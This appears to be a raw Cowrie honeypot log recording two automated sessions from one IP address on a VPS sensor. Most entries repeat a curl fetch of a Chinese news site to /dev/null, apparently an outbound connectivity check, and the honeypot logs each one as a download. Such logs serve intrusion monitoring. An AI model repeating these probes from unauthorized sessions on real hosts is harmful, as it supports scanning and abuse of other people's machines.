{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.162688Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.176155Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.189755Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.196880Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.197724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.200925Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.201909Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.213060Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.241688Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.242638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.245872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.246780Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.273830Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.281754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.282506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.287703Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.288530Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.292510Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.317682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.318472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.325651Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.326649Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.333788Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.335328Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.341825Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.343697Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.347952Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.355177Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.355946Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.367625Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.370192Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.376241Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.383428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.385406Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.386617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.392874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.393637Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.398065Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.428600Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.429637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.433460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.434435Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.442842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.470094Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.470969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.473766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.474800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.509344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.510241Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.512313Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.513200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.544780Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.545635Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.550709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.551804Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.580604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.581621Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.589531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.590247Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.615833Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.616728Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.627284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.628217Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.643793Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.651628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.652333Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.665255Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.666476Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.667802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.678820Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.682519Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.687874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.688673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.701905Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.706201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.706937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.710866Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.717507Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.720899Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.728599Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.729358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.745614Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.746505Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.759871Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.766567Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.767400Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.783113Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
